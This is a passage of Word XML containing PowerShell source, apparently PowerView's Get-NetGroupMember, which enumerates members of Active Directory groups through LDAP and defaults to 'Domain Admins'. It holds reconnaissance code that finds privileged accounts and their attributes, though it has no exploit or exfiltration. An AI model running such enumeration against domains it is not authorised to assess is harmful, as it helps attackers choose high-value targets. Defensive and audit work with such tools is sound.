    <w:p w14:paraId="3416DD44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The Group SID to query for users. If not given, it defaults to 512 "Domain Admins"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C333B7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="047E16AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7438FD2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4955C419" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A customized ldap filter string to use, e.g. "(description=*admin*)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A50CC9E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="08C6CBED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8A06C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43321B24" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for group users, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744805AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A0E9046" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC17969" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="785BA2E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E84AE1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73186BAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE776EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6CCA7362" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB95829" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77E38D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24617D14" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER FullData</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B082E79" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13EBB95E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Returns full data objects instead of just group/users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553303B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="21228901" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Recurse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EEB910" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="153E8284" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. If the group member is a group, recursively try to query its members as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A21C46B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C78F4C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UseMatchingRule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6752F05F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="73DC5F4D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query when -Recurse is specified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6840F14D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Much faster than manual recursion, but doesn't reveal cross-domain groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E75F935" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2EE61EC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3683F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F70865F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADFD1D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5781EB16" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E249DDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DC8C5DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B4098" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C9DF7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="208F70D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E8A4F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D0CC4A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGroupMember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE06A32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556D6DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the usernames that of members of the "Domain Admins" domain group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D6F77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3A2A1540" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7E1D2D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30323AE3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetGroupMember -Domain testing -GroupName "Power Users"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1209F3E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DEABCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns the usernames that of members of the "Power Users" group in the 'testing' domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5371AADE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4AB4E6DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19094218" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="133940BA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1674E748" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD9621E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3795CBC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B75196" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC1951F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C82B7DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD40E1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2E92A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="24BBFC63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE29E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322A1E6B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="14DDBBC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1978762A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D59F2B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3EC02414" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C34DA72" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AD36AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A17A760" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487CD282" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A4ADC0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="03AA8781" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401D10F1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $FullData,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361FC66B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7C0BBAAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69058DCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Recurse,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151E2DEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="41D4638B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB96CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UseMatchingRule,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4FF01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F479C9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794FDEF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828AE7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBA3997" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="52402355" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019846AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DC29AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3788A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53811899" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A998172" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($DomainController) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07C06B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetDomainController = $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6D7FB8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C98E2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106080D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetDomainController = ((Get-NetDomain -Credential $Credential).PdcRoleOwner).Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613B4A76" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA47DF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53813230" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6F43E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetDomain = $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8C3D3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7816754C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109ED588" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TargetDomain = Get-NetDomain -Credential $Credential | Select-Object -ExpandProperty name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38726BB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189A425D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70F0B430" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # so this isn't repeated if users are passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3D7D70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $GroupSearcher = Get-DomainSearcher -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -ADSpath $ADSpath -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B021006" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D83F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="222C1650" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1060B968" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($GroupSearcher) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B5830D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($Recurse -and $UseMatchingRule) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7371735E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # resolve the group to a distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6263E1B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($GroupName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD64FF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    $Group = Get-NetGroup -AllTypes -GroupName $GroupName -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C5A811" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD7403" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                elseif ($SID) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE856C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0555F945" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4891F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5114E95A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # default to domain admins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A49111E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $SID = (Get-DomainSID -Domain $TargetDomain -DomainController $TargetDomainController) + "-512"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50226332" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $Group = Get-NetGroup -AllTypes -SID $SID -Domain $TargetDomain -DomainController $TargetDomainController -Credential $Credential -FullData -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524450F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E267AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GroupDN = $Group.distinguishedname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B012D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $GroupFoundName = $Group.samaccountname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECEB3E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6AD8151B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if ($GroupDN) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAEA07F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSearcher.filter = "(&amp;(samAccountType=805306368)(memberof:1.2.840.113556.1.4.1941:=$GroupDN)$Filter)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50135D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupSearcher.PropertiesToLoad.AddRange(('distinguishedName','samaccounttype','lastlogon','lastlogontimestamp','dscorepropagationdata','objectsid','whencreated','badpasswordtime','accountexpires','iscriticalsystemobject','name','usnchanged','objectcategory','description','codepage','instancetype','countrycode','distinguishedname','cn','admincount','logonhours','objectclass','logoncount','usncreated','useraccountcontrol','objectguid','primarygroupid','lastlogoff','samaccountname','badpwdcount','whenchanged','memberof','pwdlastset','adspath'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703878F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D7482AA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
